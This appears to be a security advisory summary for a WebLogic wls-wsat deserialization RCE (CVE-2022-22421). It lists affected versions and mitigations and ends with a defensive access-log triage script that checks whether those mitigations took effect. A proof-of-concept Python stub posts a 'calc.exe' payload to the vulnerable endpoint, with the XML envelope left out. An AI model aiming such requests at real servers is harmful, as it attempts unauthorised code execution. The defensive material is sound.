### Vulnerability Summary

**Vulnerability Overview**

* **CVE ID:** CVE-2022-22421
* **Vulnerability Type:** Remote Code Execution (RCE)
* **Affected Component:** `wls-wsat` module in Oracle WebLogic Server (specifically the `CoordinatorProxy` class).
* **Description:** This vulnerability allows unauthenticated attackers to execute arbitrary system commands on the target server by sending a specially crafted SOAP request. It exploits a deserialization flaw within the `wls-wsat` module. This is a critical security vulnerability (CVSS score: 9.8).

**Affected Versions**

* **Product:** Oracle WebLogic Server
* **Vulnerable Versions:**
  * 10.3.6.0.0
  * 12.1.3.0.0
  * 12.2.1.0.0
  * 12.2.1.1.0
  * 12.2.1.2.0
  * 12.2.1.3.0
  * 12.2.1.4.0
  * 14.1.1.0.0

**Remediation**

* **Official Patch:** Apply the latest Oracle security patch (Critical Patch Update, CPU) immediately.
* **Temporary Mitigation:** If the `wls-wsat` module is not required for your environment, disable it in the WebLogic configuration. Alternatively, restrict access to the WebLogic management port via firewall rules, allowing only trusted IP addresses.

**POC/Exploit Code**

The page includes a Python script demonstrating a proof-of-concept exploit. It leverages `java.beans.XMLDecoder` for deserialization to execute the `calc.exe` command (as a test payload).

```python
import requests
import urllib3

# Suppress the warning raised by verify=False below.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# The wls-wsat CoordinatorPortType endpoint on the default WebLogic port.
url = "http://target_ip:7001/wls-wsat/CoordinatorPortType"

# Request body as reproduced on the page; the surrounding SOAP/XML envelope
# is not shown here, only the test command it carries.
payload = """
calc.exe
"""

headers = {
    "Content-Type": "text/xml",
    "SOAPAction": ""
}

try:
    response = requests.post(url, data=payload, headers=headers, verify=False)
    print(response.status_code)
    print(response.text)
except Exception as e:
    print(f"Error: {e}")
```
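The two mitigations above (remove the `wls-wsat` module, or allow only trusted source addresses to reach the management port) can both be verified from web-server access logs. The following script is an added example for defenders, not code from the advisory or from Oracle: it parses Combined Log Format lines, flags requests to the `/wls-wsat/` path used in the PoC URL above, and grades each hit by whether the source is on an allow-list and whether the module actually answered (any status other than 404 means it is still deployed). The log lines, the trusted network `10.0.0.0/8` and the Combined Log Format assumption are constructed for this example.

```python
"""Triage web-server access logs for requests to the WebLogic wls-wsat module.

Added example, not part of the original advisory or of any Oracle tooling.
Assumptions: logs are in Combined Log Format and the wls-wsat service is
reachable under the /wls-wsat/ path from the advisory's PoC URL. The sample
log lines and the trusted network below are constructed for this example.
"""
import ipaddress
import re
from typing import Dict, List, Optional

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Path prefix of the vulnerable module; CoordinatorPortType lives beneath it.
WSAT_PREFIX = "/wls-wsat/"

# Constructed sample: an external POST the module answered, an unrelated request,
# an internal POST the module answered, a probe that got 404 (module removed),
# and one line that does not parse at all.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1532 "-" "python-requests/2.31.0"',
    '10.0.0.8 - - [10/Oct/2023:13:56:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [10/Oct/2023:13:57:12 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 410 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:14:02:44 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 0 "-" "curl/8.0.1"',
    'this line is not in Combined Log Format',
]

# Networks allowed to reach the management port after the firewall mitigation (constructed).
TRUSTED_NETS = ["10.0.0.0/8"]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_trusted(ip: str, trusted_nets: List[str]) -> bool:
    """True if ip falls inside one of the allow-listed networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in ipaddress.ip_network(net) for net in trusted_nets)


def classify(rec: Dict[str, str], trusted: bool) -> str:
    """Severity of one wls-wsat hit.

    high:   POST from outside the allow-list that the module answered (not 404):
            neither mitigation is in place and the endpoint was exercised.
    medium: POST from a trusted source that the module answered: the firewall
            rule holds but the module is still deployed.
    info:   anything else, e.g. a probe answered with 404 (module gone) or a GET.
    """
    if rec["method"] != "POST" or rec["status"] == "404":
        return "info"
    return "medium" if trusted else "high"


def triage(lines: List[str], trusted_nets: List[str]) -> List[Dict[str, str]]:
    """Return one finding per request to the wls-wsat module, with a severity."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(WSAT_PREFIX):
            continue
        trusted = is_trusted(rec["ip"], trusted_nets)
        rec["trusted_source"] = "yes" if trusted else "no"
        rec["severity"] = classify(rec, trusted)
        findings.append(rec)
    return findings


def module_still_exposed(findings: List[Dict[str, str]]) -> bool:
    """True if any request to /wls-wsat/ got a non-404 answer, i.e. the module is deployed."""
    return any(f["status"] != "404" for f in findings)


if __name__ == "__main__":
    results = triage(SAMPLE_LOG, TRUSTED_NETS)
    for f in results:
        print(f'{f["severity"]:6} {f["ip"]:15} {f["method"]} {f["path"]} -> {f["status"]} '
              f'(trusted={f["trusted_source"]})')
    print("wls-wsat module still responding:", module_still_exposed(results))
```

On the constructed sample this reports the external POST as `high`, the internal POST as `medium` (the module is still deployed even though only a trusted address reached it), and the 404 probe as `info`. Feed it real WebLogic or reverse-proxy access logs and adjust `TRUSTED_NETS` to the firewall allow-list; a `medium` after the module was supposedly disabled is the signal that the mitigation did not take effect.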